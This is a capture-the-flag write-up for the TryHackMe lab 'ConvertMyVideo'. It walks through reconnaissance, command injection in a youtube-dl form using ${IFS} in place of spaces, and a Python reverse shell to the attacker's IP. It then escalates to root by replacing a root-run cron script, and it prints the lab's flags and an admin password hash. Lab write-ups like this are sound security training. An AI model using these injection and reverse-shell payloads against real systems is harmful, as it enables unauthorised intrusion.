TryHackMe "ConvertMyVideo"

April 22nd, 2023

Introduction

ConvertMyVideo is a medium room released on May 2nd, 2020 by overjt.

User Own

What is the name of the secret folder?

Nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 15:25 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 651bfc741039dfddd02df0531ceb6dec (RSA)
|   256 c42804a5c3b96a955a4d7a6e46e214db (ECDSA)
|_  256 ba07bbcd424af293d105d0b34cb1d9b1 (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3737/tcp filtered xpanel
5850/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

The system is running a website that converts YouTube videos to MP3 files. Running ffuf on the website shows a subdirectory called admin.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.xx.xx/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2563ms]
    * FUZZ: .htpasswd

[Status: 401, Size: 460, Words: 42, Lines: 15, Duration: 163ms]
    * FUZZ: admin

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .hta

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .htaccess

[Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: images

[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 158ms]
    * FUZZ: js

[Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5429ms]
    * FUZZ: index.php

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: server-status

[Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: tmp

:: Progress: [4713/4713] :: Job [1/1] :: 178 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

What is the user to access the secret folder?

The website takes an input for a YouTube ID. Supplying nothing shows the website is using youtube-dl. Checking the JavaScript for the website in main.js shows that the input is being concatenated to the base YouTube URL.

$(function () {
    $("#convert").click(function () {
        $("#message").html("Converting...");
        $.post("/", { yt_url: "https://www.youtube.com/watch?v=" + $("#ytid").val() }, function (data) {
            try {
                data = JSON.parse(data);
                if(data.status == "0"){
                    $("#message").html("<a href='" + data.result_url + "'>Download MP3</a>");
                }
                else{
                    console.log(data);
                    $("#message").html("Oops! something went wrong");
                }
            } catch (error) {
                console.log(data);
                $("#message").html("Oops! something went wrong");
            }
        });
    });

});

Using the input --;id; shows that the website is vulnerable to command injection.

{
  "status": 127,
  "errors": "WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nUsage: youtube-dl [OPTIONS] URL [URL...]\n\nyoutube-dl: error: You must provide at least one URL.\nType youtube-dl --help to see a list of all options.\nsh: 1: -f: not found\n",
  "url_orginal": "--;id;",
  "output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
  "result_url": "/tmp/downloads/6444366a5e64a.mp3"
}

A Python reverse shell can be used to get in as www-data.

Note: Spaces invalidate any command, so the string ${IFS} can be used as a substitute for a space.

Input

--;python${IFS}-c${IFS}'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")';

Terminal

nc -nvlp 1234            
listening on [any] 1234 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 43554
$ id    
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
ls
admin  images  index.php  js  style.css  tmp

Checking the admin directory:

ls admin -a
.  ..  .htaccess  .htpasswd  flag.txt  index.php

The contents of .htpasswd are:

$ cat admin/.htpasswd   
cat admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

The login credentials for the admin page are the username itsmeadmin and a hashed password.

What is the user flag?

The user flag is inside the admin directory.

$ cat admin/flag.txt
cat admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}

The flag is flag{0d8486a0c0c42503bb60ac77f4046ed7}.

System Own

What is the root flag?

Inside tmp is a file called clean.sh. Replacing the contents of clean.sh with a reverse shell will eventually get you in as root, as root runs this file periodically to remove all download files.

Terminal 1

python3 -m http.server 80

Terminal 2

wget http://10.6.xx.xx/clean.sh -O clean.sh
--2023-04-22 20:00:08--  http://10.6.xx.xx/clean.sh
Connecting to 10.6.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [text/x-sh]
Saving to: 'clean.sh'

clean.sh            100%[===================>]      49  --.-KB/s    in 0s      

2023-04-22 20:00:09 (8.09 MB/s) - 'clean.sh' saved [49/49]

Terminal 3

nc -nvlp 1235    
listening on [any] 1235 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 54788
mesg: ttyname failed: Inappropriate ioctl for device
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}

The root flag inside /root/root.txt is flag{d9b368018e912b541a4eb68399c5e94a}.

And that's the room!

PreviousHackTheBox "Soccer"NextTryHackMe "Simple CTF"

Last updated 2 years ago

hashtagIntroduction

hashtagUser Own

hashtagWhat is the name of the secret folder?

hashtagWhat is the user to access the secret folder?

hashtagWhat is the user flag?

hashtagSystem Own

hashtagWhat is the root flag?